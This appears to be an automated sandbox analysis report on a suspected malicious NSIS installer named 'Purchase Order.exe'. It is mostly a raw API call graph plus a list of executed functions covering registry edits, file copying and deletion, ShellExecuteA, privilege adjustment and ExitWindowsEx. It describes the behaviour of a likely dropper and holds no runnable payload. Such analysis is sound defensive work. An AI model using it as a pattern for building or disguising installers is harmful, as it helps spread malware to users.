2910->2913 2911->2910 2915 404fbc 2912->2915 2916 404faf SetWindowTextA 2912->2916 2913->2908 2914 404fa0 lstrcatA 2913->2914 2914->2912 2915->2908 2917 404fc2 SendMessageA SendMessageA SendMessageA 2915->2917 2916->2915 2917->2908 2970 402364 2971 40236a 2970->2971 2972 402a3a 18 API calls 2971->2972 2973 40237c 2972->2973 2974 402a3a 18 API calls 2973->2974 2975 402386 RegCreateKeyExA 2974->2975 2976 4023b0 2975->2976 2977 4028cf 2975->2977 2978 4023c8 2976->2978 2979 402a3a 18 API calls 2976->2979 2980 4023d4 2978->2980 2983 402a1d 18 API calls 2978->2983 2982 4023c1 lstrlenA 2979->2982 2981 4023ef RegSetValueExA 2980->2981 2987 402e9f 2980->2987 2985 402405 RegCloseKey 2981->2985 2982->2978 2983->2980 2985->2977 2988 402eb5 2987->2988 2989 402ee3 2988->2989 3010 4030c7 SetFilePointer 2988->3010 3007 4030b1 2989->3007 2993 402f00 GetTickCount 2996 403034 2993->2996 3003 402f4f 2993->3003 2994 40304a 2995 40308c 2994->2995 3000 40304e 2994->3000 2998 4030b1 ReadFile 2995->2998 2996->2981 2997 4030b1 ReadFile 2997->3003 2998->2996 2999 4030b1 ReadFile 2999->3000 3000->2996 3000->2999 3001 405a49 WriteFile 3000->3001 3001->3000 3002 402fa5 GetTickCount 3002->3003 3003->2996 3003->2997 3003->3002 3004 402fca MulDiv wsprintfA 3003->3004 3006 405a49 WriteFile 3003->3006 3005 404f48 25 API calls 3004->3005 3005->3003 3006->3003 3008 405a1a ReadFile 3007->3008 3009 402eee 3008->3009 3009->2993 3009->2994 3009->2996 3010->2989 3131 401dea 3132 402a3a 18 API calls 3131->3132 3133 401df0 3132->3133 3134 402a3a 18 API calls 3133->3134 3135 401df9 3134->3135 3136 402a3a 18 API calls 3135->3136 3137 401e02 3136->3137 3138 402a3a 18 API calls 3137->3138 3139 401e0b 3138->3139 3140 401423 25 API calls 3139->3140 3141 401e12 ShellExecuteA 3140->3141 3142 401e3f 3141->3142 3892 40366d 3893 403678 3892->3893 3894 40367c 3893->3894 3895 40367f GlobalAlloc 3893->3895 3895->3894 3896 401eee 3897 402a3a 18 API calls 3896->3897 3898 401ef5 3897->3898 3899 4060c8 5 API calls 3898->3899 3900 401f04 3899->3900 3901 401f1c GlobalAlloc 3900->3901 3910 401f84 3900->3910 3902 401f30 3901->3902 3901->3910 3903 4060c8 5 API calls 3902->3903 3904 401f37 3903->3904 3905 4060c8 5 API calls 3904->3905 3906 401f41 3905->3906 3906->3910 3911 405c8d wsprintfA 3906->3911 3908 401f78 3912 405c8d wsprintfA 3908->3912 3911->3908 3912->3910 3913 4014f0 SetForegroundWindow 3914 4028cf 3913->3914 3920 4018f5 3921 40192c 3920->3921 3922 402a3a 18 API calls 3921->3922 3923 401931 3922->3923 3924 4055d1 69 API calls 3923->3924 3925 40193a 3924->3925 3926 4024f7 3927 402a3a 18 API calls 3926->3927 3928 4024fe 3927->3928 3931 4059a2 GetFileAttributesA CreateFileA 3928->3931 3930 40250a 3931->3930 3932 4018f8 3933 402a3a 18 API calls 3932->3933 3934 4018ff 3933->3934 3935 405525 MessageBoxIndirectA 3934->3935 3936 401908 3935->3936 3937 4014fe 3938 401506 3937->3938 3940 401519 3937->3940 3939 402a1d 18 API calls 3938->3939 3939->3940 3941 402b7f 3942 402ba7 3941->3942 3943 402b8e SetTimer 3941->3943 3944 402bfc 3942->3944 3945 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3942->3945 3943->3942 3945->3944 3946 401000 3947 401037 BeginPaint GetClientRect 3946->3947 3948 40100c DefWindowProcA 3946->3948 3950 4010f3 3947->3950 3953 401179 3948->3953 3951 401073 CreateBrushIndirect FillRect DeleteObject 3950->3951 3952 4010fc 3950->3952 3951->3950 3954 401102 CreateFontIndirectA 3952->3954 3955 401167 EndPaint 3952->3955 3954->3955 3956 401112 6 API calls 3954->3956 3955->3953 3956->3955 2918 402482 2929 402b44 2918->2929 2920 40248c 2933 402a1d 2920->2933 2922 402495 2923 40249f 2922->2923 2926 4026a6 2922->2926 2924 4024b8 RegEnumValueA 2923->2924 2925 4024ac RegEnumKeyA 2923->2925 2924->2926 2927 4024d1 RegCloseKey 2924->2927 2925->2927 2927->2926 2930 402a3a 18 API calls 2929->2930 2931 402b5d 2930->2931 2932 402b6b RegOpenKeyExA 2931->2932 2932->2920 2934 405d51 18 API calls 2933->2934 2935 402a31 2934->2935 2935->2922 3957 401b02 3958 402a3a 18 API calls 3957->3958 3959 401b09 3958->3959 3960 402a1d 18 API calls 3959->3960 3961 401b12 wsprintfA 3960->3961 3962 4028cf 3961->3962 2936 402283 2937 402291 2936->2937 2938 40228b 2936->2938 2940 402a3a 18 API calls 2937->2940 2941 4022a1 2937->2941 2939 402a3a 18 API calls 2938->2939 2939->2937 2940->2941 2942 402a3a 18 API calls 2941->2942 2944 4022af 2941->2944 2942->2944 2943 402a3a 18 API calls 2945 4022b8 WritePrivateProfileStringA 2943->2945 2944->2943 3963 401a03 3964 402a3a 18 API calls 3963->3964 3965 401a0c ExpandEnvironmentStringsA 3964->3965 3966 401a20 3965->3966 3968 401a33 3965->3968 3967 401a25 lstrcmpA 3966->3967 3966->3968 3967->3968 3011 405086 3012 405231 3011->3012 3013 4050a8 GetDlgItem GetDlgItem GetDlgItem 3011->3013 3015 405261 3012->3015 3016 405239 GetDlgItem CreateThread FindCloseChangeNotification 3012->3016 3057 403f49 SendMessageA 3013->3057 3017 40528f 3015->3017 3021 4052b0 3015->3021 3022 405277 ShowWindow ShowWindow 3015->3022 3016->3015 3060 40501a OleInitialize 3016->3060 3018 405297 3017->3018 3019 4052ea 3017->3019 3023 4052c3 ShowWindow 3018->3023 3024 40529f 3018->3024 3019->3021 3034 4052f7 SendMessageA 3019->3034 3020 405118 3026 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3020->3026 3025 403f7b 8 API calls 3021->3025 3059 403f49 SendMessageA 3022->3059 3030 4052e3 3023->3030 3031 4052d5 3023->3031 3028 403eed SendMessageA 3024->3028 3029 4052bc 3025->3029 3032 405171 SendMessageA SendMessageA 3026->3032 3033 40518d 3026->3033 3028->3021 3036 403eed SendMessageA 3030->3036 3035 404f48 25 API calls 3031->3035 3032->3033 3037 4051a0 3033->3037 3038 405192 SendMessageA 3033->3038 3034->3029 3039 405310 CreatePopupMenu 3034->3039 3035->3030 3036->3019 3040 403f14 19 API calls 3037->3040 3038->3037 3041 405d51 18 API calls 3039->3041 3043 4051b0 3040->3043 3042 405320 AppendMenuA 3041->3042 3044 405351 TrackPopupMenu 3042->3044 3045 40533e GetWindowRect 3042->3045 3046 4051b9 ShowWindow 3043->3046 3047 4051ed GetDlgItem SendMessageA 3043->3047 3044->3029 3048 40536d 3044->3048 3045->3044 3049 4051dc 3046->3049 3050 4051cf ShowWindow 3046->3050 3047->3029 3051 405214 SendMessageA SendMessageA 3047->3051 3052 40538c SendMessageA 3048->3052 3058 403f49 SendMessageA 3049->3058 3050->3049 3051->3029 3052->3052 3053 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3052->3053 3055 4053cb SendMessageA 3053->3055 3055->3055 3056 4053ed GlobalUnlock SetClipboardData CloseClipboard 3055->3056 3056->3029 3057->3020 3058->3047 3059->3017 3061 403f60 SendMessageA 3060->3061 3065 40503d 3061->3065 3062 405064 3063 403f60 SendMessageA 3062->3063 3064 405076 OleUninitialize 3063->3064 3065->3062 3066 401389 2 API calls 3065->3066 3066->3065 3067 402308 3068 402338 3067->3068 3069 40230d 3067->3069 3071 402a3a 18 API calls 3068->3071 3070 402b44 19 API calls 3069->3070 3072 402314 3070->3072 3073 40233f 3071->3073 3074 40231e 3072->3074 3078 402355 3072->3078 3079 402a7a RegOpenKeyExA 3073->3079 3075 402a3a 18 API calls 3074->3075 3076 402325 RegDeleteValueA RegCloseKey 3075->3076 3076->3078 3080 402b0e 3079->3080 3084 402aa5 3079->3084 3080->3078 3081 402acb RegEnumKeyA 3082 402add RegCloseKey 3081->3082 3081->3084 3090 4060c8 GetModuleHandleA 3082->3090 3083 402b02 RegCloseKey 3088 402af1 3083->3088 3084->3081 3084->3082 3084->3083 3086 402a7a 5 API calls 3084->3086 3086->3084 3088->3080 3089 402b1d RegDeleteKeyA 3089->3088 3091 4060e4 3090->3091 3092 4060ee GetProcAddress 3090->3092 3096 40605a GetSystemDirectoryA 3091->3096 3094 402aed 3092->3094 3094->3088 3094->3089 3095 4060ea 3095->3092 3095->3094 3097 40607c wsprintfA LoadLibraryExA 3096->3097 3097->3095 3099 402688 3100 402a3a 18 API calls 3099->3100 3101 40268f FindFirstFileA 3100->3101 3102 4026b2 3101->3102 3106 4026a2 3101->3106 3104 4026b9 3102->3104 3107 405c8d wsprintfA 3102->3107 3108 405d2f lstrcpynA 3104->3108 3107->3104 3108->3106 3969 401c8a 3970 402a1d 18 API calls 3969->3970 3971 401c90 IsWindow 3970->3971 3972 4019f3 3971->3972 3973 40430b 3974 404341 3973->3974 3975 40431b 3973->3975 3977 403f7b 8 API calls 3974->3977 3976 403f14 19 API calls 3975->3976 3978 404328 SetDlgItemTextA 3976->3978 3979 40434d 3977->3979 3978->3974 3230 40310f SetErrorMode GetVersion 3231 403146 3230->3231 3232 40314c 3230->3232 3233 4060c8 5 API calls 3231->3233 3234 40605a 3 API calls 3232->3234 3233->3232 3235 403162 lstrlenA 3234->3235 3235->3232 3236 403171 3235->3236 3237 4060c8 5 API calls 3236->3237 3238 403179 3237->3238 3239 4060c8 5 API calls 3238->3239 3240 403180 #17 OleInitialize SHGetFileInfoA 3239->3240 3318 405d2f lstrcpynA 3240->3318 3242 4031bd GetCommandLineA 3319 405d2f lstrcpynA 3242->3319 3244 4031cf GetModuleHandleA 3245 4031e6 3244->3245 3246 4057cc CharNextA 3245->3246 3247 4031fa CharNextA 3246->3247 3256 40320a 3247->3256 3248 4032d4 3249 4032e7 GetTempPathA 3248->3249 3320 4030de 3249->3320 3251 4032ff 3253 403303 GetWindowsDirectoryA lstrcatA 3251->3253 3254 403359 DeleteFileA 3251->3254 3252 4057cc CharNextA 3252->3256 3257 4030de 12 API calls 3253->3257 3330 402c66 GetTickCount GetModuleFileNameA 3254->3330 3256->3248 3256->3252 3258 4032d6 3256->3258 3260 40331f 3257->3260 3414 405d2f lstrcpynA 3258->3414 3259 40336d 3267 4057cc CharNextA 3259->3267 3300 4033f3 3259->3300 3313 403403 3259->3313 3260->3254 3262 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3260->3262 3264 4030de 12 API calls 3262->3264 3265 403351 3264->3265 3265->3254 3265->3313 3271 403388 3267->3271 3269 40353b 3273 403543 GetCurrentProcess OpenProcessToken 3269->3273 3274 4035bd ExitProcess 3269->3274 3270 40341d 3424 405525 3270->3424 3278 403433 3271->3278 3279 4033ce 3271->3279 3275 40358e 3273->3275 3276 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3273->3276 3281 4060c8 5 API calls 3275->3281 3276->3275 3428 4054a8 3278->3428 3282 40588f 18 API calls 3279->3282 3284 403595 3281->3284 3285 4033d9 3282->3285 3289 4035aa ExitWindowsEx 3284->3289 3292 4035b6 3284->3292 3285->3313 3415 405d2f lstrcpynA 3285->3415 3287 403454 lstrcatA lstrcmpiA 3291 403470 3287->3291 3287->3313 3288 403449 lstrcatA 3288->3287 3289->3274 3289->3292 3294 403475 3291->3294 3295 40347c 3291->3295 3296 40140b 2 API calls 3292->3296 3293 4033e8 3416 405d2f lstrcpynA 3293->3416 3431 40540e CreateDirectoryA 3294->3431 3436 40548b CreateDirectoryA 3295->3436 3296->3274 3358 4036af 3300->3358 3302 403481 SetCurrentDirectoryA 3303 403490 3302->3303 3304 40349b 3302->3304 3439 405d2f lstrcpynA 3303->3439 3440 405d2f lstrcpynA 3304->3440 3307 405d51 18 API calls 3308 4034da DeleteFileA 3307->3308 3309 4034e7 CopyFileA 3308->3309 3315 4034a9 3308->3315 3309->3315 3310 40352f 3312 405bea 38 API calls 3310->3312 3311 405bea 38 API calls 3311->3315 3312->3313 3417 4035d5 3313->3417 3314 405d51 18 API calls 3314->3315 3315->3307 3315->3310 3315->3311 3315->3314 3316 4054c0 2 API calls 3315->3316 3317 40351b CloseHandle 3315->3317 3316->3315 3317->3315 3318->3242 3319->3244 3321 405f9a 5 API calls 3320->3321 3322 4030ea 3321->3322 3323 4030f4 3322->3323 3324 4057a1 3 API calls 3322->3324 3323->3251 3325 4030fc 3324->3325 3326 40548b 2 API calls 3325->3326 3327 403102 3326->3327 3441 4059d1 3327->3441 3445 4059a2 GetFileAttributesA CreateFileA 3330->3445 3332 402ca6 3350 402cb6 3332->3350 3446 405d2f lstrcpynA 3332->3446 3334 402ccc 3335 4057e8 2 API calls 3334->3335 3336 402cd2 3335->3336 3447 405d2f lstrcpynA 3336->3447 3338 402cdd GetFileSize 3339 402dd9 3338->3339 3352 402cf4 3338->3352 3448 402c02 3339->3448 3341 402de2 3343 402e12 GlobalAlloc 3341->3343 3341->3350 3460 4030c7 SetFilePointer 3341->3460 3342 4030b1 ReadFile 3342->3352 3459 4030c7 SetFilePointer 3343->3459 3345 402e45 3349 402c02 6 API calls 3345->3349 3347 402dfb 3351 4030b1 ReadFile 3347->3351 3348 402e2d 3353 402e9f 32 API calls 3348->3353 3349->3350 3350->3259 3354 402e06 3351->3354 3352->3339 3352->3342 3352->3345 3352->3350 3355 402c02 6 API calls 3352->3355 3356 402e39 3353->3356 3354->3343 3354->3350 3355->3352 3356->3350 3356->3356 3357 402e76 SetFilePointer 3356->3357 3357->3350 3359 4060c8 5 API calls 3358->3359 3360 4036c3 3359->3360 3361 4036c9 3360->3361 3362 4036db 3360->3362 3470 405c8d wsprintfA 3361->3470 3363 405c16 3 API calls 3362->3363 3364 403706 3363->3364 3365 403724 lstrcatA 3364->3365 3367 405c16 3 API calls 3364->3367 3368 4036d9 3365->3368 3367->3365 3461 403974 3368->3461 3371 40588f 18 API calls 3372 403756 3371->3372 3373 4037df 3372->3373 3375 405c16 3 API calls 3372->3375 3374 40588f 18 API calls 3373->3374 3376 4037e5 3374->3376 3377 403782 3375->3377 3378 4037f5 LoadImageA 3376->3378 3379 405d51 18 API calls 3376->3379 3377->3373 3385 40379e lstrlenA 3377->3385 3386 4057cc CharNextA 3377->3386 3380 40389b 3378->3380 3381 40381c RegisterClassA 3378->3381 3379->3378 3384 40140b 2 API calls 3380->3384 3382 403852 SystemParametersInfoA CreateWindowExA 3381->3382 3383 4038a5 3381->3383 3382->3380 3383->3313 3389 4038a1 3384->3389 3387 4037d2 3385->3387 3388 4037ac lstrcmpiA 3385->3388 3390 40379c 3386->3390 3392 4057a1 3 API calls 3387->3392 3388->3387 3391 4037bc GetFileAttributesA 3388->3391 3389->3383 3394 403974 19 API calls 3389->3394 3390->3385 3393 4037c8 3391->3393 3395 4037d8 3392->3395 3393->3387 3396 4057e8 2 API calls 3393->3396 3397 4038b2 3394->3397 3471 405d2f lstrcpynA 3395->3471 3396->3387 3399 403941 3397->3399 3400 4038be ShowWindow 3397->3400 3401 40501a 5 API calls 3399->3401 3402 40605a 3 API calls 3400->3402 3403 403947 3401->3403 3404 4038d6 3402->3404 3405 403963 3403->3405 3406 40394b 3403->3406 3407 4038e4 GetClassInfoA 3404->3407 3411 40605a 3 API calls 3404->3411 3410 40140b 2 API calls 3405->3410 3406->3383 3413 40140b 2 API calls 3406->3413 3408 4038f8 GetClassInfoA RegisterClassA 3407->3408 3409 40390e DialogBoxParamA 3407->3409 3408->3409 3412 40140b 2 API calls 3409->3412 3410->3383 3411->3407 3412->3383 3413->3383 3414->3249 3415->3293 3416->3300 3418 4035ed 3417->3418 3419 4035df CloseHandle 3417->3419 3473 40361a 3418->3473 3419->3418 3422 4055d1 69 API calls 3423 40340c OleUninitialize 3422->3423 3423->3269 3423->3270 3425 40553a 3424->3425 3426 40342b ExitProcess 3425->3426 3427 40554e MessageBoxIndirectA 3425->3427 3427->3426 3429 4060c8 5 API calls 3428->3429 3430 403438 lstrcatA 3429->3430 3430->3287 3430->3288 3432 40347a 3431->3432 3433 40545f GetLastError 3431->3433 3432->3302 3433->3432 3434 40546e SetFileSecurityA 3433->3434 3434->3432 3435 405484 GetLastError 3434->3435 3435->3432 3437 40549b 3436->3437 3438 40549f GetLastError 3436->3438 3437->3302 3438->3437 3439->3304 3440->3315 3442 4059dc GetTickCount GetTempFileNameA 3441->3442 3443 40310d 3442->3443 3444 405a09 3442->3444 3443->3251 3444->3442 3444->3443 3445->3332 3446->3334 3447->3338 3449 402c23 3448->3449 3450 402c0b 3448->3450 3453 402c33 GetTickCount 3449->3453 3454 402c2b 3449->3454 3451 402c14 DestroyWindow 3450->3451 3452 402c1b 3450->3452 3451->3452 3452->3341 3456 402c41 CreateDialogParamA ShowWindow 3453->3456 3457 402c64 3453->3457 3455 406104 2 API calls 3454->3455 3458 402c31 3455->3458 3456->3457 3457->3341 3458->3341 3459->3348 3460->3347 3462 403988 3461->3462 3472 405c8d wsprintfA 3462->3472 3464 4039f9 3465 405d51 18 API calls 3464->3465 3466 403a05 SetWindowTextA 3465->3466 3467 403a21 3466->3467 3468 403734 3466->3468 3467->3468 3469 405d51 18 API calls 3467->3469 3468->3371 3469->3467 3470->3368 3471->3373 3472->3464 3474 403628 3473->3474 3475 40362d FreeLibrary GlobalFree 3474->3475 3476 4035f2 3474->3476 3475->3475 3475->3476 3476->3422 3477 402410 3478 402b44 19 API calls 3477->3478 3479 40241a 3478->3479 3480 402a3a 18 API calls 3479->3480 3481 402423 3480->3481 3482 40242d RegQueryValueExA 3481->3482 3486 4026a6 3481->3486 3483 402453 RegCloseKey 3482->3483 3484 40244d 3482->3484 3483->3486 3484->3483 3488 405c8d wsprintfA 3484->3488 3488->3483 3980 401490 3981 404f48 25 API calls 3980->3981 3982 401497 3981->3982 3983 401f90 3984 401fa2 3983->3984 3985 402050 3983->3985 3986 402a3a 18 API calls 3984->3986 3987 401423 25 API calls 3985->3987 3988 401fa9 3986->3988 3994 4021c9 3987->3994 3989 402a3a 18 API calls 3988->3989 3990 401fb2 3989->3990 3991 401fc7 LoadLibraryExA 3990->3991 3992 401fba GetModuleHandleA 3990->3992 3991->3985 3993 401fd7 GetProcAddress 3991->3993 3992->3991 3992->3993 3995 402023 3993->3995 3996 401fe6 3993->3996 3997 404f48 25 API calls 3995->3997 3998 401423 25 API calls 3996->3998 3999 401ff6 3996->3999 3997->3999 3998->3999 3999->3994 4000 402044 FreeLibrary 3999->4000 4000->3994 4001 401595 4002 402a3a 18 API calls 4001->4002 4003 40159c SetFileAttributesA 4002->4003 4004 4015ae 4003->4004 4005 402616 4006 40261d 4005->4006 4007 40287c 4005->4007 4008 402a1d 18 API calls 4006->4008 4009 402628 4008->4009 4010 40262f SetFilePointer 4009->4010 4010->4007 4011 40263f 4010->4011 4013 405c8d wsprintfA 4011->4013 4013->4007 3556 401717 3557 402a3a 18 API calls 3556->3557 3558 40171e SearchPathA 3557->3558 3559 401739 3558->3559 4014 402519 4015 40252e 4014->4015 4016 40251e 4014->4016 4017 402a3a 18 API calls 4015->4017 4018 402a1d 18 API calls 4016->4018 4019 402535 lstrlenA 4017->4019 4020 402527 4018->4020 4019->4020 4021 402557 4020->4021 4022 405a49 WriteFile 4020->4022 4022->4021 4023 40149d 4024 4014ab PostQuitMessage 4023->4024 4025 40226e 4023->4025 4024->4025 4026 4046a3 4027 4046b3 4026->4027 4028 4046cf 4026->4028 4037 405509 GetDlgItemTextA 4027->4037 4030 404702 4028->4030 4031 4046d5 SHGetPathFromIDListA 4028->4031 4033 4046e5 4031->4033 4036 4046ec SendMessageA 4031->4036 4032 4046c0 SendMessageA 4032->4028 4034 40140b 2 API calls 4033->4034 4034->4036 4036->4030 4037->4032 4038 401ca7 4039 402a1d 18 API calls 4038->4039 4040 401cae 4039->4040 4041 402a1d 18 API calls 4040->4041 4042 401cb6 GetDlgItem 4041->4042 4043 402513 4042->4043 4044 404028 lstrcpynA lstrlenA 3143 40192a 3144 40192c 3143->3144 3145 402a3a 18 API calls 3144->3145 3146 401931 3145->3146 3149 4055d1 3146->3149 3189 40588f 3149->3189 3152 405610 3157 40573e 3152->3157 3203 405d2f lstrcpynA 3152->3203 3153 4055f9 DeleteFileA 3154 40193a 3153->3154 3156 405636 3158 405649 3156->3158 3159 40563c lstrcatA 3156->3159 3157->3154 3160 406033 2 API calls 3157->3160 3204 4057e8 lstrlenA 3158->3204 3161 40564f 3159->3161 3164 405762 3160->3164 3163 40565d lstrcatA 3161->3163 3165 405668 lstrlenA FindFirstFileA 3161->3165 3163->3165 3164->3154 3166 405766 3164->3166 3165->3157 3171 40568c 3165->3171 3217 4057a1 lstrlenA CharPrevA 3166->3217 3168 4057cc CharNextA 3168->3171 3170 405589 5 API calls 3172 405778 3170->3172 3171->3168 3176 40571d FindNextFileA 3171->3176 3185 4056de 3171->3185 3208 405d2f lstrcpynA 3171->3208 3173 405792 3172->3173 3174 40577c 3172->3174 3175 404f48 25 API calls 3173->3175 3174->3154 3179 404f48 25 API calls 3174->3179 3175->3154 3176->3171 3178 405735 FindClose 3176->3178 3178->3157 3180 405789 3179->3180 3181 405bea 38 API calls 3180->3181 3184 405790 3181->3184 3183 4055d1 62 API calls 3183->3185 3184->3154 3185->3176 3185->3183 3186 404f48 25 API calls 3185->3186 3187 404f48 25 API calls 3185->3187 3188 405bea 38 API calls 3185->3188 3209 405589 3185->3209 3186->3176 3187->3185 3188->3185 3220 405d2f lstrcpynA 3189->3220 3191 4058a0 3221 40583a CharNextA CharNextA 3191->3221 3194 4055f1 3194->3152 3194->3153 3195 405f9a 5 API calls 3201 4058b6 3195->3201 3196 4058e1 lstrlenA 3197 4058ec 3196->3197 3196->3201 3199 4057a1 3 API calls 3197->3199 3198 406033 2 API calls 3198->3201 3200 4058f1 GetFileAttributesA 3199->3200 3200->3194 3201->3194 3201->3196 3201->3198 3202 4057e8 2 API calls 3201->3202 3202->3196 3203->3156 3205 4057f5 3204->3205 3206 405806 3205->3206 3207 4057fa CharPrevA 3205->3207 3206->3161 3207->3205 3207->3206 3208->3171 3227 40597d GetFileAttributesA 3209->3227 3212 4055a4 RemoveDirectoryA 3214 4055b2 3212->3214 3213 4055ac DeleteFileA 3213->3214 3215 4055b6 3214->3215 3216 4055c2 SetFileAttributesA 3214->3216 3215->3185 3216->3215 3218 40576c 3217->3218 3219 4057bb lstrcatA 3217->3219 3218->3170 3219->3218 3220->3191 3222 405855 3221->3222 3225 405865 3221->3225 3223 405860 CharNextA 3222->3223 3222->3225 3226 405885 3223->3226 3224 4057cc CharNextA 3224->3225 3225->3224 3225->3226 3226->3194 3226->3195 3228 405595 3227->3228 3229 40598f SetFileAttributesA 3227->3229 3228->3212 3228->3213 3228->3215 3229->3228 4045 4028aa SendMessageA 4046 4028c4 InvalidateRect 4045->4046 4047 4028cf 4045->4047 4046->4047 3530 4015b3 3531 402a3a 18 API calls 3530->3531 3532 4015ba 3531->3532 3533 40583a 4 API calls 3532->3533 3534 4015c2 3533->3534 3535 40161c 3534->3535 3536 4057cc CharNextA 3534->3536 3542 40548b 2 API calls 3534->3542 3545 4054a8 5 API calls 3534->3545 3546 4015eb 3534->3546 3547 401604 GetFileAttributesA 3534->3547 3537 401621 3535->3537 3538 40164a 3535->3538 3536->3534 3539 401423 25 API calls 3537->3539 3540 401423 25 API calls 3538->3540 3541 401628 3539->3541 3548 401642 3540->3548 3550 405d2f lstrcpynA 3541->3550 3542->3534 3544 401633 SetCurrentDirectoryA 3544->3548 3545->3534 3546->3534 3549 40540e 4 API calls 3546->3549 3547->3534 3549->3546 3550->3544 4048 4016b3 4049 402a3a 18 API calls 4048->4049 4050 4016b9 GetFullPathNameA 4049->4050 4051 4016d0 4050->4051 4052 4016f1 4050->4052 4051->4052 4055 406033 2 API calls 4051->4055 4053 401705 GetShortPathNameA 4052->4053 4054 4028cf 4052->4054 4053->4054 4056 4016e1 4055->4056 4056->4052 4058 405d2f lstrcpynA 4056->4058 4058->4052 4059 4014b7 4060 4014bd 4059->4060 4061 401389 2 API calls 4060->4061 4062 4014c5 4061->4062 4063 401d38 GetDC GetDeviceCaps 4064 402a1d 18 API calls 4063->4064 4065 401d56 MulDiv ReleaseDC 4064->4065 4066 402a1d 18 API calls 4065->4066 4067 401d75 4066->4067 4068 405d51 18 API calls 4067->4068 4069 401dae CreateFontIndirectA 4068->4069 4070 402513 4069->4070 4071 404ebc 4072 404ee0 4071->4072 4073 404ecc 4071->4073 4074 404ee8 IsWindowVisible 4072->4074 4082 404eff 4072->4082 4075 404ed2 4073->4075 4076 404f29 4073->4076 4074->4076 4077 404ef5 4074->4077 4079 403f60 SendMessageA 4075->4079 4078 404f2e CallWindowProcA 4076->4078 4080 404813 5 API calls 4077->4080 4081 404edc 4078->4081 4079->4081 4080->4082 4082->4078 4083 404893 4 API calls 4082->4083 4083->4076 4084 40173e 4085 402a3a 18 API calls 4084->4085 4086 401745 4085->4086 4087 4059d1 2 API calls 4086->4087 4088 40174c 4087->4088 4088->4088 4089 401ebe 4090 402a3a 18 API calls 4089->4090 4091 401ec5 4090->4091 4092 406033 2 API calls 4091->4092 4093 401ecb 4092->4093 4095 401edd 4093->4095 4096 405c8d wsprintfA 4093->4096 4096->4095 4097 40193f 4098 402a3a 18 API calls 4097->4098 4099 401946 lstrlenA 4098->4099 4100 402513 4099->4100

                                                          Executed Functions

                                                          Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357stringcomfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 8 403150 1->8 3 40315c-40316f call 40605a lstrlenA 2->3 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 3->9 8->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 27 4032e7-403301 GetTempPathA call 4030de 23->27 25 403215-40321d 24->25 26 40320f-403213 24->26 28 403225-403228 25->28 29 40321f-403220 25->29 26->25 26->26 37 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 27->37 38 403359-403373 DeleteFileA call 402c66 27->38 31 4032ba-4032c7 call 4057cc 28->31 32 40322e-403232 28->32 29->28 31->22 47 4032c9 31->47 35 403234-40323a 32->35 36 40324a-403277 32->36 41 403240 35->41 42 40323c-40323e 35->42 43 403279-40327f 36->43 44 40328a-4032b8 36->44 37->38 55 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 37->55 52 403407-403417 call 4035d5 OleUninitialize 38->52 53 403379-40337f 38->53 41->36 42->36 42->41 49 403281-403283 43->49 50 403285 43->50 44->31 46 4032d6-4032e2 call 405d2f 44->46 46->27 47->22 49->44 49->50 50->44 66 40353b-403541 52->66 67 40341d-40342d call 405525 ExitProcess 52->67 56 403381-40338c call 4057cc 53->56 57 4033f7-4033fe call 4036af 53->57 55->38 55->52 68 4033c2-4033cc 56->68 69 40338e-4033b7 56->69 64 403403 57->64 64->52 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 78 403433-403447 call 4054a8 lstrcatA 68->78 79 4033ce-4033db call 40588f 68->79 75 4033b9-4033bb 69->75 73 40358e-40359c call 4060c8 71->73 74 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->74 76 4035c7 72->76 77 4035cb-4035cf ExitProcess 72->77 90 4035aa-4035b4 ExitWindowsEx 73->90 91 40359e-4035a8 73->91 74->73 75->68 82 4033bd-4033c0 75->82 76->77 88 403454-40346e lstrcatA lstrcmpiA 78->88 89 403449-40344f lstrcatA 78->89 79->52 92 4033dd-4033f3 call 405d2f * 2 79->92 82->68 82->75 88->52 94 403470-403473 88->94 89->88 90->72 95 4035b6-4035b8 call 40140b 90->95 91->90 91->95 92->57 97 403475-40347a call 40540e 94->97 98 40347c call 40548b 94->98 95->72 106 403481-40348e SetCurrentDirectoryA 97->106 98->106 107 403490-403496 call 405d2f 106->107 108 40349b-4034c3 call 405d2f 106->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 118 40352f-403536 call 405bea 115->118 116->115 117 4034f9-403519 call 405bea call 405d51 call 4054c0 116->117 117->115 127 40351b-403522 CloseHandle 117->127 118->52 127->115
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403134
                                                          • GetVersion.KERNEL32 ref: 0040313A
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                          • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                          • OleInitialize.OLE32(00000000), ref: 0040318C
                                                          • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                          • GetCommandLineA.KERNEL32(Misguidingly Setup,NSIS Error), ref: 004031BD
                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Purchase Order.exe",00000000), ref: 004031D0
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Purchase Order.exe",00000020), ref: 004031FB
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
